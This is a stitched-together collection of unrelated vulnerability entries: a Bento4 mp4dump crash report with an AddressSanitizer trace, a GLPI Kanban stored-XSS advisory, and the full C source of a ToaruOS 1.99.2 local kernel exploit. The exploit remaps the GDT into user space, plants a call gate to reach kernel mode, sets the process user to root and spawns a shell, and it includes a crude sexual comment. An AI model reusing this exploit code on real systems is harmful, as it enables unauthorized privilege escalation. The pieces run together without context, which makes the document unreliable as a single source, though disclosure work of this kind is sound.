Bento4 MP4Dump v1.2 was discovered to contain a segmentation violation via an unknown address at /Source/C++/Core/Ap4DataBuffer.cpp:175.

SUMMARY: AddressSanitizer: SEGV on unknown address 0x000000000000 in /Source/C++/Core/Ap4DataBuffer.cpp:175

*   Version

    $ ./mp4dump 
    MP4 File Dumper - Version 1.2
    (Bento4 Version 1.6.0.0)
    (c) 2002-2011 Axiomatic Systems, LLC
    

branch d02ef82

*   Platform

    $ gcc --version
    gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0
    Copyright (C) 2019 Free Software Foundation, Inc.
    This is free software; see the source for copying conditions.  There is NO
    warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
    
    $ uname -r
    5.13.0-40-generic
    
    $ lsb_release -a
    No LSB modules are available.
    Distributor ID:	Ubuntu
    Description:	Ubuntu 20.04.4 LTS
    Release:	20.04
    Codename:	focal
    

*   Steps to reproduce

    $ mkdir build
    $ cd build
    $ cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" -DCMAKE_MODULE_LINKER_FLAGS="-fsanitize=address"
    $ make
    
    $ ./mp4dump poc
    

*   Asan

    $ ./mp4dump poc
    [ftyp] size=8+16
      major_brand = mk24
      minor_version = 24017c
      compatible_brand = yl73
      compatible_brand = oxsh
    [free] size=8+0
    [mdat] size=8+397
    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==2476501==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f73f2e09321 bp 0x7fffe8de6b70 sp 0x7fffe8de62e0 T0)
    ==2476501==The signal is caused by a READ memory access.
    ==2476501==Hint: address points to the zero page.
        #0 0x7f73f2e09320 in AddressIsPoisoned ../../../../src/libsanitizer/asan/asan_mapping.h:396
        #1 0x7f73f2e09320 in QuickCheckForUnpoisonedRegion ../../../../src/libsanitizer/asan/asan_interceptors_memintrinsics.h:30
        #2 0x7f73f2e09320 in __interceptor_memcpy ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:790
        #3 0x55719b16636b in AP4_DataBuffer::SetData(unsigned char const*, unsigned int) /home/wulearn/Bento4/Source/C++/Core/Ap4DataBuffer.cpp:175
        #4 0x55719b14744a in AP4_AvccAtom::AP4_AvccAtom(unsigned int, unsigned char const*) /home/wulearn/Bento4/Source/C++/Core/Ap4AvccAtom.cpp:176
        #5 0x55719b1464ab in AP4_AvccAtom::Create(unsigned int, AP4_ByteStream&) /home/wulearn/Bento4/Source/C++/Core/Ap4AvccAtom.cpp:95
        #6 0x55719b140dc6 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:513
        #7 0x55719b13e5ee in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234
        #8 0x55719b15161d in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/wulearn/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194
        #9 0x55719b1bfeea in AP4_SampleEntry::Read(AP4_ByteStream&, AP4_AtomFactory&) /home/wulearn/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:115
        #10 0x55719b1c46f0 in AP4_VisualSampleEntry::AP4_VisualSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/wulearn/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:884
        #11 0x55719b1c5c2a in AP4_AvcSampleEntry::AP4_AvcSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/wulearn/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:1136
        #12 0x55719b13f203 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:319
        #13 0x55719b13e5ee in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234
        #14 0x55719b1d5c90 in AP4_StsdAtom::AP4_StsdAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/wulearn/Bento4/Source/C++/Core/Ap4StsdAtom.cpp:101
        #15 0x55719b1d550f in AP4_StsdAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/wulearn/Bento4/Source/C++/Core/Ap4StsdAtom.cpp:57
        #16 0x55719b1409a6 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:458
        #17 0x55719b13e5ee in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234
        #18 0x55719b15161d in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/wulearn/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194
        #19 0x55719b151080 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/wulearn/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139
        #20 0x55719b150be7 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/wulearn/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88
        #21 0x55719b142358 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816
        #22 0x55719b13e5ee in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234
        #23 0x55719b15161d in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/wulearn/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194
        #24 0x55719b151080 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/wulearn/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139
        #25 0x55719b150be7 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/wulearn/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88
        #26 0x55719b142358 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816
        #27 0x55719b13e5ee in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234
        #28 0x55719b15161d in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/wulearn/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194
        #29 0x55719b151080 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/wulearn/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139
        #30 0x55719b150be7 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/wulearn/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88
        #31 0x55719b142358 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816
        #32 0x55719b13e5ee in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234
        #33 0x55719b15161d in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/wulearn/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194
        #34 0x55719b151080 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/wulearn/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139
        #35 0x55719b1eb610 in AP4_TrakAtom::AP4_TrakAtom(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/wulearn/Bento4/Source/C++/Core/Ap4TrakAtom.cpp:165
        #36 0x55719b143429 in AP4_TrakAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/home/wulearn/Bento4/build/mp4dump+0x324429)
        #37 0x55719b14063f in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:413
        #38 0x55719b13e5ee in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234
        #39 0x55719b15161d in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/wulearn/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194
        #40 0x55719b151080 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/wulearn/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139
        #41 0x55719b189a6c in AP4_MoovAtom::AP4_MoovAtom(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/wulearn/Bento4/Source/C++/Core/Ap4MoovAtom.cpp:80
        #42 0x55719b1433bb in AP4_MoovAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/home/wulearn/Bento4/build/mp4dump+0x3243bb)
        #43 0x55719b1404b8 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:393
        #44 0x55719b13e5ee in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234
        #45 0x55719b13dbbd in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154
        #46 0x55719b130115 in main /home/wulearn/Bento4/Source/C++/Apps/Mp4Dump/Mp4Dump.cpp:342
        #47 0x7f73f28540b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2)
        #48 0x55719b12e8ed in _start (/home/wulearn/Bento4/build/mp4dump+0x30f8ed)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV ../../../../src/libsanitizer/asan/asan_mapping.h:396 in AddressIsPoisoned
    ==2476501==ABORTING
    

poc: poc.zip

Thanks!

CVE-2022-31282: SEGV on unknown address 0x000000000000 in /Source/C++/Core/Ap4DataBuffer.cpp:175 · Issue #708 · axiomatic-systems/Bento4

GLPI is a Free Asset and IT Management Software package, that provides ITIL Service Desk features, licenses tracking and software auditing. Kanban is a GLPI view to display Projects, Tickets, Changes or Problems on a task board. In versions prior to 10.0.1 a user can exploit a cross site scripting vulnerability in Kanban by injecting HTML code in its user name. Users are advised to upgrade. There are no known workarounds for this issue.

**Stored XSS on Kanban**

Moderate

trasher published GHSA-33g2-m556-gccr

Jun 9, 2022

**Package**

glpi (glpi)

**Affected versions**

10.0.0

**Patched versions**

10.0.1

**Description**

**Impact**

A user can exploit a XSS on Kanban by injecting HTML code in its user name.

**Patches**

Fixed in 10.0.1.

**Severity**

Moderate

**CVE ID**

CVE-2022-24876

**Weaknesses**

CWE-80

CVE-2022-24876

ToaruOS 1.99.2 is affected by incorrect access control via the kernel. Improper MMU management and having a low GDT address allows it to be mapped in userland. A call gate can then be written to escalate to CPL 0.

/\* \* The Mickey Mouse Hacking Squadron proudly presents \* \* ToaruOS 1.99.2 sysfunc local kernel exploit \* \* PART III: THE MMU STRIKES BACK \* Starring \* \* Kay 'What the MMU?' Lange \* Mickey Mouse \* \* \* .-"""-. \* / . - \\ \* \\ / \* .-""-.,:.-\_-.< \* / \_; , / ).| \* \\ ; / \` \`" '\\ \* '.-| ;-.\_\_\_\_, | ., \* \\ \`.\_~\_/ / /"/ \* ,. /\`-.\_\_.-'\\\`-.\_ ,",' ; \* \\"\\ / /| o \\.\_ \`-.\_; / ./-. \* ; ';, / / | \`\_\_ \\ \`-.,( / //.-' \* :\\ \\\\;\_.-" ; |.-"\` \`\`\\ /-. /.-' \* :\\ .\\),.-' / }{ | '..' \* \\ .-\\ | , / \* '..' ;' , / \* ( \_\_ \`;--;'\_\_\`) \* \`//'\` \`||\` \* \_// || \* .-"-.\_,(\_\_) .(\_\_).-""-. \* / \\ / \\ \* \\ / \\ / \* \`'--=="--\` \`--""==--'\` \* \* local@livecd ~$ gcc -Wall kowasu-sysfunc-strikes-back.c -o meh \* local@livecd ~$ whoami \* local \* local@livecd ~$ ./meh \* 0@livecd /home/local# whoami \* root \* \* Tested on VMWare only. If this crashes ToaruOS, well, so does ToaruOS. \*/ #include <assert.h\> #include <stdio.h\> #include <unistd.h\> #include <inttypes.h\> #include <string.h\> #include <sys/sysfunc.h\> #include <kernel/process.h\> #include <kernel/spinlock.h\> #include <kernel/arch/x86\_64/pml.h\> #define ENTRY\_MASK 0x1FF #define PAGE\_SHIFT 12 #define CANONICAL\_MASK 0xFFFFFFFFFFFFULL #define HIGH\_MAP\_REGION 0xFFFFFF8000000000ULL #define PAGE\_ALIGN(x) ((x) & ~0xFFF) #define PAGE\_ADDR(x) (((x) & CANONICAL\_MASK) >> PAGE\_SHIFT) #define PML4\_PAGE(pml, a) ((pml\[PAGE\_ADDR(a) >> 27\].bits.page) << PAGE\_SHIFT) #define PDP\_PAGE(pml, a) ((pml\[PAGE\_ADDR(a) >> 18\].bits.page) << PAGE\_SHIFT) #define PD\_PAGE(pml, a) ((pml\[PAGE\_ADDR(a) >> 9\].bits.page) << PAGE\_SHIFT) struct gdtr { uint16\_t limit; uint64\_t base; } \_\_attribute\_\_((packed)); typedef struct { uint32\_t address; uint16\_t selector; } \_\_attribute\_\_((packed)) lcall\_arg\_t; /\* We access the GDTR from both user and kernel, so we keep it global. \*/ struct gdtr g; /\* We also access the TSS descriptor and backup from user and kernel. \*/ uint8\_t \*tss; uint8\_t tss\_old\[16\]; static inline uint16\_t make\_selector(int index, int ti, int rpl) { return index << 3 | ti << 2 | rpl; } static inline void make\_callgate(void \*p, uint16\_t selector, uint64\_t offset, int dpl) { ((uint16\_t \*)p)\[0\] = offset; ((uint16\_t \*)p)\[1\] = selector; ((uint8\_t \*)p)\[4\] = 0; ((uint8\_t \*)p)\[5\] = 0x80 | dpl << 5 | 12; ((uint16\_t \*)p)\[3\] = offset >> 16; ((uint32\_t \*)p)\[2\] = offset >> 32; ((uint32\_t \*)p)\[3\] = 0; } static inline void \* mmu\_map\_from\_physical(uintptr\_t frameaddress) { return (void \*)(frameaddress | HIGH\_MAP\_REGION); } static inline union PML \* mmu\_get\_page(uint64\_t address) { union PML \*pml; /\* We take shortcuts: if the first GDT page were to suddenly have \* disappeared from the tables we're fucked like a skank on roofies \* during prom night anyway. \*/ pml = this\_core->current\_pml; pml = mmu\_map\_from\_physical(PML4\_PAGE(pml, address)); pml = mmu\_map\_from\_physical(PDP\_PAGE(pml, address)); pml = mmu\_map\_from\_physical(PD\_PAGE(pml, address)); return (union PML \*)&pml\[PAGE\_ADDR(address) & ENTRY\_MASK\]; } /\* Safety play. Modern times are so wordy. I really really really \* wanna push- and popa. \*/ extern void callgate(void); asm ( ".global callgate\\n" "callgate:\\n" "swapgs\\n" "push %r15\\n" "push %r14\\n" "push %r13\\n" "push %r12\\n" "push %r11\\n" "push %r10\\n" "push %r9\\n" "push %r8\\n" "push %rdi\\n" "push %rsi\\n" "push %rdx\\n" "push %rcx\\n" "push %rbx\\n" "push %rax\\n" "call callgate\_handler\\n" "pop %rax\\n" "pop %rbx\\n" "pop %rcx\\n" "pop %rdx\\n" "pop %rsi\\n" "pop %rdi\\n" "pop %r8\\n" "pop %r9\\n" "pop %r10\\n" "pop %r11\\n" "pop %r12\\n" "pop %r13\\n" "pop %r14\\n" "pop %r15\\n" "swapgs\\n" "lretq\\n" ); /\* CPL0 code. \*/ void callgate\_handler(void) { union PML \*gdt\_page; spin\_lock(this\_core->current\_process\->image.lock); this\_core->current\_process\->user = 0; this\_core->current\_process\->real\_user = 0; /\* Get the GDT base page and give it back to the kernel. This way the \* process exit routine will not free it once we exit. \*/ gdt\_page = mmu\_get\_page(PAGE\_ALIGN(g.base)); gdt\_page->bits.user = 0; /\* Invalidate the TLB entry for the first GDT page. \*/ asm volatile ("invlpg (%0)"::"r"(PAGE\_ALIGN(g.base)):"memory"); /\* Restore the GDT TSS descriptor while we're at it. \*/ for (int i = 0; i < 16; i++) tss\[i\] = tss\_old\[i\]; spin\_unlock(this\_core->current\_process\->image.lock); } int main(void) { char \*args\[2\]; /\* Get the GDTR so we can target the base descriptor table. \*/ asm volatile ("sgdt %0":"\=m"(g)::"memory"); /\* Get the TSS descriptor, as we can clobber it with a callgate. TR \* caches the descriptor value, so ruining it does not really matter \* much, and we'll restore it when we're done. \*/ tss = (void \*)(g.base + 40); /\* Call TOARU\_SYS\_FUNC\_MMAP to remap the lower region GDT. \* \* This was initialized in the lower ranges during multiboot, and as a \* result the higher page directories are not owned by the kernel but \* by the user. Next mmu\_frame\_allocate will conveniently set the user \* bit to 1 for us. \*/ args\[0\] = (char \*)PAGE\_ALIGN(g.base); args\[1\] = (char \*)4096; if (sysfunc(TOARU\_SYS\_FUNC\_MMAP, args) < 0) { perror("sysfunc()"); exit(EXIT\_FAILURE); } /\* Make a copy of the TSS descriptor for restoration later on. \*/ memcpy(tss\_old, tss, 16); /\* Make a CPL3 -> CPL0 callgate. Note that the kernel cs descriptor is \* at GDT index 1. \*/ make\_callgate(tss, make\_selector(1, 0, 0), (uint64\_t)callgate, 3); /\* Perform a far call to the callgate we set up at GDT index 5. We \* call a callgate so a 32-bit call destination is fine, as the \* destination comes from the gate descriptor anyway. \*/ lcall\_arg\_t lca = { 0, make\_selector(5, 0, 3) }; asm volatile ("lcall \*%0"::"m"(lca)); /\* This is my boom schtick! \*/ args\[0\] = "/bin/sh"; args\[1\] = NULL; execve("/bin/sh", args, NULL); /\* Well, crud. \*/ perror("execve()"); exit(EXIT\_FAILURE); }

Tag

#c++